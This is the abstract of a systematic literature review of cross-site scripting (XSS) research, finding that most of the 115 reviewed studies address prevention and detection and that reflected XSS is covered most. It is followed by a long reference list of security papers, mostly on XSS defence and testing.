Current state of research on cross-site scripting (XSS) - A systematic literature review

Context: Cross-site scripting (XSS) is a security vulnerability that affects web applications. It occurs due to improper or lack of sanitization of user inputs. The security vulnerability caused many problems for users and server applications. Objective: To conduct a systematic literature review on the studies done on XSS vulnerabilities and attacks. Method: We followed the standard guidelines for systematic literature review as documented by Barbara Kitchenham and reviewed a total of 115 studies related to cross-site scripting from various journals and conference proceedings. Results: Research on XSS is still very active with publications across many conference proceedings and journals. Attack prevention and vulnerability detection are the areas focused on by most of the studies. Dynamic analysis techniques form the majority among the solutions proposed by the various studies. The type of XSS addressed the most is reflected XSS. Conclusion: XSS still remains a big problem for web applications, despite the bulk of solutions provided so far. There is no single solution that can effectively mitigate XSS attacks. More research is needed in the area of vulnerability removal from the source code of the applications before deployment.

[1]  Laurence Duchien,et al.  AProSec: an Aspect for Programming Secure Web Applications , 2007, The Second International Conference on Availability, Reliability and Security (ARES'07).

[2]  Junho Choi,et al.  Efficient Malicious Code Detection Using N-Gram Analysis and SVM , 2011, 2011 14th International Conference on Network-Based Information Systems.

[3]  José María Sierra,et al.  LAPSE+ Static Analysis Security Software: Vulnerabilities Detection in Java EE Applications , 2011 .

[4]  Mohammad Zulkernine,et al.  DESERVE: A Framework for Detecting Program Security Vulnerability Exploitations , 2012, 2012 IEEE Sixth International Conference on Software Security and Reliability.

[5]  V. N. Venkatakrishnan,et al.  WebAppArmor: A Framework for Robust Prevention of Attacks on Web Applications (Invited Paper) , 2010, ICISS.

[6]  Lance Fortnow,et al.  ViewpointTime for computer science to grow up , 2009, Commun. ACM.

[7]  Marco Vieira,et al.  Testing and Comparing Web Vulnerability Scanning Tools for SQL Injection and XSS Attacks , 2007 .

[8]  Angelina Geetha,et al.  Intrusion Protection against SQL Injection and Cross Site Scripting Attacks Using a Reverse Proxy , 2012, SNDS.

[9]  S. Selvakumar,et al.  BIXSAN: browser independent XSS sanitizer for prevention of XSS attacks , 2011, SOEN.

[10]  Eduardo Feitosa,et al.  Automatic classification of cross-site scripting in web pages using document-based and URL-based features , 2012, 2012 IEEE Symposium on Computers and Communications (ISCC).

[11]  Luigi Coppolino,et al.  From Intrusion Detection to Intrusion Detection and Diagnosis: An Ontology-Based Approach , 2009, SEUS.

[12]  Phyllis G. Frankl,et al.  Preventing Web Application Injections with Complementary Character Coding , 2011, ESORICS.

[13]  Divya Bansal,et al.  Optimized client side solution for cross site scripting , 2008, 2008 16th IEEE International Conference on Networks.

[14]  Jianhua Sun,et al.  An execution-flow based method for detecting Cross-site Scripting attacks , 2010, The 2nd International Conference on Software Engineering and Data Mining.

[15]  Dawn Xiaodong Song,et al.  Secure Content Sniffing for Web Browsers, or How to Stop Papers from Reviewing Themselves , 2009, 2009 30th IEEE Symposium on Security and Privacy.

[16]  K. Sivakumar,et al.  Constructing a "Common Cross Site Scripting Vulnerabilities Enumeration (CXE)" Using CWE and CVE , 2007, ICISS.

[17]  Onur Aciiçmez,et al.  Alhambra: a system for creating, enforcing, and testing browser security policies , 2010, WWW '10.

[18]  Marco Vieira,et al.  Testing and Comparing Web Vulnerability Scanning Tools for SQL Injection and XSS Attacks , 2007, 13th Pacific Rim International Symposium on Dependable Computing (PRDC 2007).

[19]  Zhoujun Li,et al.  Program Slicing Stored XSS Bugs in Web Application , 2011, 2011 Fifth International Conference on Theoretical Aspects of Software Engineering.

[20]  R. Sekar,et al.  Protection, usability and improvements in reflected XSS filters , 2012, ASIACCS '12.

[21]  Incheon Paik,et al.  Classification of malicious web code by machine learning , 2011, 2011 3rd International Conference on Awareness Science and Technology (iCAST).

[22]  Dake He,et al.  Model Checking for the Defense against Cross-Site Scripting Attacks , 2012, 2012 International Conference on Computer Science and Service System.

[23]  Zhou Li,et al.  FIRM: capability-based inline mediation of Flash behaviors , 2010, ACSAC '10.

[24]  Mohammad Zulkernine,et al.  MUTEC: Mutation-based testing of Cross Site Scripting , 2009, 2009 ICSE Workshop on Software Engineering for Secure Systems.

[25]  Levente Buttyán,et al.  XCS based hidden firmware modification on embedded devices , 2011, SoftCOM 2011, 19th International Conference on Software, Telecommunications and Computer Networks.

[26]  Tzi-cker Chiueh,et al.  Dynamic multi-process information flow tracking for web application security , 2007, MC '07.

[27]  Eyas El-Qawasmeh,et al.  Discovering security vulnerabilities and leaks in ASP.NET websites , 2012, Proceedings Title: 2012 International Conference on Cyber Security, Cyber Warfare and Digital Forensic (CyberSec).

[28]  M. Ponnavaikko,et al.  Risk mitigation for cross site scripting attacks using signature based model on the server side , 2007 .

[29]  Collin Jackson,et al.  Regular expressions considered harmful in client-side XSS filters , 2010, WWW '10.

[30]  Christopher Krügel,et al.  Leveraging User Interactions for In-Depth Testing of Web Applications , 2008, RAID.

[31]  James Purtilo,et al.  A Testbed for the Evaluation of Web Intrusion Prevention Systems , 2011, 2011 Third International Workshop on Security Measurements and Metrics.

[32]  Christopher Krügel,et al.  Client-side cross-site scripting protection , 2009, Comput. Secur..

[33]  Zhi-jian Wang,et al.  Notice of RetractionA Static Analysis Tool for Detecting Web Application Injection Vulnerabilities for ASP Program , 2010, 2010 2nd International Conference on E-business and Information System Security.

[34]  Mohammad Zulkernine,et al.  S2XS2: A Server Side Approach to Automatically Detect XSS Attacks , 2011, 2011 IEEE Ninth International Conference on Dependable, Autonomic and Secure Computing.

[35]  Christopher Krügel,et al.  Pixy: a static analysis tool for detecting Web application vulnerabilities , 2006, 2006 IEEE Symposium on Security and Privacy (S&P'06).

[36]  Pearl Brereton,et al.  Performing systematic literature reviews in software engineering , 2006, ICSE.

[37]  Thorsten Holz,et al.  Crouching tiger - hidden payload: security risks of scalable vectors graphics , 2011, CCS '11.

[38]  C. M. Frenz,et al.  XSSmon: A Perl based IDS for the detection of potential XSS attacks , 2012, 2012 IEEE Long Island Systems, Applications and Technology Conference (LISAT).

[39]  Wouter Joosen,et al.  FlashOver: automated discovery of cross-site scripting vulnerabilities in rich internet applications , 2012, ASIACCS '12.

[40]  Martin Hofmann,et al.  Type-Based Enforcement of Secure Programming Guidelines - Code Injection Prevention at SAP , 2011, Formal Aspects in Security and Trust.

[41]  V. N. Venkatakrishnan,et al.  XSS-GUARD: Precise Dynamic Prevention of Cross-Site Scripting Attacks , 2008, DIMVA.

[42]  M. Ponnavaikko,et al.  A solution to block Cross Site Scripting Vulnerabilities based on Service Oriented Architecture , 2007, 6th IEEE/ACIS International Conference on Computer and Information Science (ICIS 2007).

[43]  Sanjay Rawat,et al.  XSS Vulnerability Detection Using Model Inference Assisted Evolutionary Fuzzing , 2012, 2012 IEEE Fifth International Conference on Software Testing, Verification and Validation.

[44]  Marc-André Laverdière,et al.  Assisting Programmers Resolving Vulnerabilities in Java Web Applications , 2011 .

[45]  Carla Merkle Westphall,et al.  Proposal and development of the Web services input validation model , 2012, 2012 IEEE Network Operations and Management Symposium.

[46]  Dawn Xiaodong Song,et al.  A Systematic Analysis of XSS Sanitization in Web Application Frameworks , 2011, ESORICS.

[47]  Nicolas Juillerat,et al.  Enforcing code security in database web applications using libraries and object models , 2007, LCSD '07.

[48]  Dan Boneh,et al.  XCS: cross channel scripting and its impact on web applications , 2009, CCS.

[49]  Mariano Ceccato,et al.  Grammar based oracle for security testing of web applications , 2012, 2012 7th International Workshop on Automation of Software Test (AST).

[50]  Úlfar Erlingsson,et al.  Using web application construction frameworks to protect against code injection attacks , 2007, PLAS '07.

[51]  V. N. Venkatakrishnan,et al.  Blueprint: Robust Prevention of Cross-site Scripting Attacks for Existing Browsers , 2009, 2009 30th IEEE Symposium on Security and Privacy.

[52]  Fang Yu,et al.  Stranger: An Automata-Based String Analysis Tool for PHP , 2010, TACAS.

[53]  Pratheep Bunyatnoparat,et al.  Protecting cookies from Cross Site Script attacks using Dynamic Cookies Rewriting technique , 2011, 13th International Conference on Advanced Communication Technology (ICACT2011).

[54]  Masaru Takesue A Protection Scheme against the Attacks Deployed by Hiding the Violation of the Same Origin Policy , 2008, 2008 Second International Conference on Emerging Security Information, Systems and Technologies.

[55]  Fang Yu,et al.  String Abstractions for String Verification , 2011, SPIN.

[56]  Kaloian Petkov Overcoming programming flaws: indexing of common software vulnerabilities , 2005, InfoSecCD '05.

[57]  Mariano Ceccato,et al.  Security Testing of Web Applications: A Search-Based Approach for Cross-Site Scripting Vulnerabilities , 2011, 2011 IEEE 11th International Working Conference on Source Code Analysis and Manipulation.

[58]  Michael D. Ernst,et al.  Automatic creation of SQL Injection and cross-site scripting attacks , 2009, 2009 IEEE 31st International Conference on Software Engineering.

[59]  Dwen-Ren Tsai,et al.  Optimum tuning of defense settings for common attacks on the web applications , 2009, 43rd Annual 2009 International Carnahan Conference on Security Technology.

[60]  Tao Xie,et al.  Perturbation-based user-input-validation testing of web applications , 2010, J. Syst. Softw..

[61]  Lwin Khin Shar,et al.  Automated removal of cross site scripting vulnerabilities in web applications , 2012, Inf. Softw. Technol..

[62]  Christopher Krügel,et al.  Cross Site Scripting Prevention with Dynamic Data Tainting and Static Analysis , 2007, NDSS.

[63]  Amir Herzberg,et al.  Off-Path Attacking the Web , 2012, WOOT.

[64]  Joachim Posegga,et al.  XSSDS: Server-Side Detection of Cross-Site Scripting Attacks , 2008, 2008 Annual Computer Security Applications Conference (ACSAC).

[65]  Massimo Franceschet,et al.  The role of conference publications in CS , 2010, Commun. ACM.

[66]  Anna Cinzia Squicciarini,et al.  XSS-Dec: A Hybrid Solution to Mitigate Cross-Site Scripting Attacks , 2012, DBSec.

[67]  Mohammad Zulkernine,et al.  Trustworthiness testing of phishing websites: A behavior model-based approach , 2012, Future Gener. Comput. Syst..

[68]  Giovanni Agosta,et al.  Automated Security Analysis of Dynamic Web Applications through Symbolic Code Execution , 2012, 2012 Ninth International Conference on Information Technology - New Generations.

[69]  Christopher Krügel,et al.  Precise alias analysis for static detection of web application vulnerabilities , 2006, PLAS '06.

[70]  Joachim Posegga,et al.  Secure Code Generation for Web Applications , 2010, ESSoS.

[71]  Jeremiah Grossman,et al.  XSS Attacks: Cross Site Scripting Exploits and Defense , 2007 .

[72]  Hiroshi Doi,et al.  An Implementation of the Binding Mechanism in the Web Browser for Preventing XSS Attacks: Introducing the Bind-Value Headers , 2009, 2009 International Conference on Availability, Reliability and Security.

[73]  Giuseppe A. Di Lucca,et al.  Identifying cross site scripting vulnerabilities in Web applications , 2004, Proceedings. Sixth IEEE International Workshop on Web Site Evolution.

[74]  R. Priyadarshini,et al.  A cross platform intrusion detection system using inter server communication technique , 2011, 2011 International Conference on Recent Trends in Information Technology (ICRTIT).

[75]  Anh Nguyen-Tuong,et al.  Automatically Hardening Web Applications Using Precise Tainting , 2005, SEC.

[76]  Joaquín García Alfaro,et al.  Prevention of Cross-Site Scripting Attacks on Current Web Applications , 2007 .

[77]  Martin Johns SessionSafe: Implementing XSS Immune Session Handling , 2006, ESORICS.

[78]  Dawn Xiaodong Song,et al.  Document Structure Integrity: A Robust Basis for Cross-site Scripting Defense , 2009, NDSS.

[79]  Zhendong Su,et al.  Static detection of cross-site scripting vulnerabilities , 2008, 2008 ACM/IEEE 30th International Conference on Software Engineering.

[80]  Lwin Khin Shar,et al.  Mining input sanitization patterns for predicting SQL injection and cross site scripting vulnerabilities , 2012, 2012 34th International Conference on Software Engineering (ICSE).

[81]  Xiang Chen,et al.  D-WAV: A Web Application Vulnerabilities Detection Tool Using Characteristics of Web Forms , 2010, 2010 Fifth International Conference on Software Engineering Advances.

[82]  Zhendong Su,et al.  Client-Side Detection of XSS Worms by Monitoring Payload Propagation , 2009, ESORICS.

[83]  Mohammad Zulkernine,et al.  Injecting Comments to Detect JavaScript Code Injection Attacks , 2011, 2011 IEEE 35th Annual Computer Software and Applications Conference Workshops.

[84]  Jörg Schwenk,et al.  All your clouds are belong to us: security analysis of cloud management interfaces , 2011, CCSW '11.

[85]  Hao Chen,et al.  Noncespaces: Using Randomization to Enforce Information Flow Tracking and Thwart Cross-Site Scripting Attacks , 2009, NDSS.

[86]  Youki Kadobayashi,et al.  A proposal and implementation of automatic detection/collection system for cross-site scripting vulnerability , 2004, 18th International Conference on Advanced Information Networking and Applications, 2004. AINA 2004..

[87]  Lwin Khin Shar,et al.  Auditing the defense against cross site scripting in web applications , 2010, 2010 International Conference on Security and Cryptography (SECRYPT).

[88]  David Sands,et al.  Lightweight self-protecting JavaScript , 2009, ASIACCS '09.

[89]  Liam Peyton,et al.  Model-Based Penetration Test Framework for Web Applications Using TTCN-3 , 2009, MCETECH.

[90]  Elena Castro,et al.  A multi-agent scanner to detect stored-XSS vulnerabilities , 2010, 2010 International Conference for Internet Technology and Secured Transactions.

[91]  Hao Chen,et al.  Noncespaces: Using randomization to defeat cross-site scripting attacks , 2012, Comput. Secur..

[92]  Mariano Ceccato,et al.  Towards security testing with taint analysis and genetic algorithms , 2010, SESS '10.

[93]  Evangelos P. Markatos,et al.  Hunting Cross-Site Scripting Attacks in the Network , 2010 .

[94]  Avik Chaudhuri,et al.  Symbolic security analysis of ruby-on-rails web applications , 2010, CCS '10.

[95]  Erwin Adi A design of a proxy inspired from human immune system to detect SQL Injection and Cross-Site Scripting , 2012 .

[96]  Lwin Khin Shar,et al.  Predicting common web application vulnerabilities from input validation and sanitization code patterns , 2012, 2012 Proceedings of the 27th IEEE/ACM International Conference on Automated Software Engineering.

[97]  Lwin Khin Shar,et al.  Auditing the XSS defence features implemented in web application programs , 2012, IET Softw..

[98]  Vinod Yegneswaran,et al.  Poster: a path-cutting approach to blocking XSS worms in social web networks , 2011, CCS '11.

[99]  M. Ponnavaikko,et al.  XSS Application Worms: New Internet Infestation and Optimized Protective Measures , 2007, Eighth ACIS International Conference on Software Engineering, Artificial Intelligence, Networking, and Parallel/Distributed Computing (SNPD 2007).

[100]  Joseph Y. Halpern,et al.  Journals for certification, conferences for rapid dissemination , 2011, CACM.

[101]  Benjamin Livshits,et al.  SCRIPTGARD: automatic context-sensitive sanitization for large-scale legacy web applications , 2011, CCS '11.

[102]  Benjamin Livshits,et al.  Fast and Precise Sanitizer Analysis with BEK , 2011, USENIX Security Symposium.

[103]  Didier Colle,et al.  2015 IEEE Conference on Computer Communications Workshops (INFOCOM WKSHPS) , 2015 .

[104]  Christopher Krügel,et al.  Noxes: a client-side solution for mitigating cross-site scripting attacks , 2006, SAC '06.

[105]  M. Ponnavaikko,et al.  Behavior-Based Anomaly Detection on the Server Side to Reduce the Effectiveness of Cross Site Scripting Vulnerabilities , 2007, Third International Conference on Semantics, Knowledge and Grid (SKG 2007).

[106]  Christopher Krügel,et al.  SWAP: Mitigating XSS attacks using a reverse proxy , 2009, 2009 ICSE Workshop on Software Engineering for Secure Systems.

[107]  Yasuhiko Minamide,et al.  Static approximation of dynamically generated Web pages , 2005, WWW '05.

[108]  Pankaj Sharma,et al.  Integrated approach to prevent SQL injection attack and reflected cross site scripting attack , 2012, Int. J. Syst. Assur. Eng. Manag..

[109]  D. Arulsuju Hunting malicious attacks in social networks , 2011, 2011 Third International Conference on Advanced Computing.

[110]  M. Ponnavaikko,et al.  Risk mitigation for cross site scripting attacks using signature based model on the server side , 2007, Second International Multi-Symposiums on Computer and Computational Sciences (IMSCCS 2007).

[111]  Christopher Krügel,et al.  SecuBat: a web vulnerability scanner , 2006, WWW '06.

[112]  Ali Selamat,et al.  Information and Software Technology , 2014 .

[113]  Hossein Saidi,et al.  Social Networks' XSS Worms , 2009, 2009 International Conference on Computational Science and Engineering.

[114]  Pearl Brereton,et al.  Protocol for a Tertiary study of Systematic Literature Reviews and Evidence-based Guidelines in IT and Software Engineering , 2009 .

[115]  Keqin Li,et al.  Towards Security Vulnerability Detection by Source Code Model Checking , 2010, 2010 Third International Conference on Software Testing, Verification, and Validation Workshops.

[116]  Xu Jing,et al.  MBDS: Model-based detection system for Cross Site Scripting , 2007 .

[117]  Zhenfu Cao,et al.  L-WMxD: Lexical based Webmail XSS Discoverer , 2011, 2011 IEEE Conference on Computer Communications Workshops (INFOCOM WKSHPS).

[118]  Florian Kerschbaum,et al.  Simple cross-site attack prevention , 2007, 2007 Third International Conference on Security and Privacy in Communications Networks and the Workshops - SecureComm 2007.

[119]  Monica S. Lam,et al.  Automatic Generation of XSS and SQL Injection Attacks with Goal-Directed Model Checking , 2008, USENIX Security Symposium.

[120]  Jan-Min Chen,et al.  An automated vulnerability scanner for injection attack based on injection point , 2010, 2010 International Computer Symposium (ICS2010).

[121]  Shiuh-Jeng Wang,et al.  Investigations in Cross-site Script on Web-systems Gathering Digital Evidence against Cyber-Intrusions , 2007, Future Generation Communication and Networking (FGCN 2007).

[122]  Benedict G. E. Wiedemann Protection? , 1998, Science.

[123]  Wouter Joosen,et al.  SessionShield: Lightweight Protection against Session Hijacking , 2011, ESSoS.

[124]  S. Usha,et al.  Prevention Of Cross-Site Scripting Attacks (XSS) On Web Applications In The Client Side , 2011 .

[125]  William K. Robertson,et al.  Preventing Input Validation Vulnerabilities in Web Applications through Automated Type Analysis , 2012, 2012 IEEE 36th Annual Computer Software and Applications Conference.